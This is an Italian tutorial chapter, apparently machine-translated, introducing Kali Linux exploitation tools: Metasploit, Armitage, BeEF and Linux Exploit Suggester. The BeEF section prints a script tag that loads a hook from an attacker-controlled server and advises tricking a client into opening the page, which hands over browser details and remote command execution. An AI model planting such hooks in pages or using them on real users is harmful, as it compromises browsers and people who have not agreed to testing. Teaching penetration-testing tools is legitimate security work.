Kali Linux - Strumenti di sfruttamento

In questo capitolo apprenderemo i vari strumenti di sfruttamento offerti da Kali Linux.

Metasploit

Come accennato prima, Metasploit è un prodotto di Rapid7 e la maggior parte delle risorse può essere trovata sulla loro pagina web www.metasploit.com . È disponibile in due versioni: edizione commerciale e gratuita. Le differenze tra queste due versioni non sono molto quindi, in questo caso useremo la versione Community (gratuita).

In qualità di hacker etico, utilizzerai "Kali Ditribution" che ha la versione della community di Metasploit incorporata, insieme ad altri strumenti di hacking etico che sono molto comodi risparmiando tempo di installazione. Tuttavia, se si desidera installare come strumento separato, è un'applicazione che può essere installata nei sistemi operativi come Linux, Windows e OS X.

Innanzitutto, apri la console Metasploit in Kali. Quindi, vai su Applicazioni → Strumenti di sfruttamento → Metasploit.

Dopo l'avvio, vedrai la seguente schermata, dove la versione di Metasploit è sottolineata in rosso.

Nella console, se usi la guida o? simbolo, ti mostrerà un elenco con i comandi di MSP insieme alla loro descrizione. Puoi scegliere in base alle tue esigenze ea cosa utilizzerai.

Un altro importante comando di amministrazione è msfupdateche aiuta ad aggiornare il metasploit con gli ultimi exploit di vulnerabilità. Dopo aver eseguito questo comando nella console, dovrai attendere diversi minuti fino al completamento dell'aggiornamento.

Ha un buon comando chiamato "Cerca" che puoi usare per trovare quello che vuoi come mostrato nello screenshot seguente. Ad esempio, voglio trovare exploit relativi a Microsoft e il comando può esseremsf >search name:Microsoft type:exploit.

Dove "cerca" è il comando, "nome" è il nome dell'oggetto che stiamo cercando e "tipo" è il tipo di script che stiamo cercando.

Un altro comando è "info". Fornisce le informazioni relative a un modulo o una piattaforma in cui viene utilizzato, l'autore, il riferimento alla vulnerabilità e la restrizione del carico utile che può avere.

Armitage

La GUI di Armitage per metasploit è uno strumento complementare per metasploit. Visualizza gli obiettivi, consiglia gli exploit ed espone le funzionalità avanzate di post-sfruttamento.

Apriamolo, ma prima di tutto dovrebbe essere aperta e avviata la console di metasploit. Per aprire Armitage, vai su Applicazioni → Strumenti exploit → Armitage.

Clicca il Connect pulsante, come mostrato nella seguente schermata.

Quando si apre, vedrai la seguente schermata.

Armitage è facile da usare. L'area "Obiettivi" elenca tutte le macchine che hai scoperto e con cui stai lavorando, i bersagli violati sono di colore rosso con un temporale.

Dopo aver hackerato il bersaglio, puoi fare clic con il pulsante destro del mouse su di esso e continuare a esplorare con ciò che devi fare come esplorare (sfogliare) le cartelle.

Nella seguente GUI, vedrai la vista per le cartelle, che si chiama console. Semplicemente facendo clic sulle cartelle, è possibile navigare tra le cartelle senza la necessità di comandi di metasploit.

Sul lato destro della GUI, c'è una sezione in cui sono elencati i moduli delle vulnerabilità.

Manzo

BeEF sta per Browser Exploitation Framework. È uno strumento di test di penetrazione che si concentra sul browser web. BeEF consente al penetration tester professionista di valutare l'effettiva posizione di sicurezza di un ambiente di destinazione utilizzando vettori di attacco lato client.

Innanzitutto, devi aggiornare il pacchetto Kali utilizzando i seguenti comandi:

[email protected]:/# apt-get update  
[email protected]:/# apt-get install beef-xss

Per iniziare, usa il seguente comando:

[email protected]:/# cd /usr/share/beef-xss  
[email protected]:/# ./beef

Apri il browser e inserisci il nome utente e la password: beef.

L'hook BeEF è un file JavaScript ospitato sul server BeEF che deve essere eseguito sui browser dei client. Quando lo fa, richiama il server BeEF comunicando molte informazioni sul target. Consente inoltre di eseguire comandi e moduli aggiuntivi contro il target. In questo esempio, la posizione diBeEF hook è a http://192.168.1.101:3000/hook.js.

Per attaccare un browser, includi l'hook JavaScript in una pagina che il client visualizzerà. Ci sono diversi modi per farlo, tuttavia il più semplice è inserire quanto segue in una pagina e in qualche modo convincere il client ad aprirla.

<script src = "http://192.168.1.101:3000/hook.js" type = "text/javascript"></script>

Una volta caricata la pagina, torna al pannello di controllo di BeEF e fai clic su "Browser online" in alto a sinistra. Dopo alcuni secondi, dovresti vedere il pop-up del tuo indirizzo IP che rappresenta un browser collegato. Il passaggio del mouse sull'IP fornirà rapidamente informazioni come la versione del browser, il sistema operativo e i plug-in installati.

Per eseguire il comando in remoto, fare clic sull'host "Posseduto". Quindi, sul comando fare clic sul modulo che si desidera eseguire, e infine fare clic su "Esegui".

Linux Exploit Suggester

Suggerisce possibili exploit data la versione di rilascio ‘uname -r’ del sistema operativo Linux.

Per eseguirlo, digita il seguente comando:

[email protected]:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0

3.0.0 è la versione del kernel del sistema operativo Linux che vogliamo sfruttare.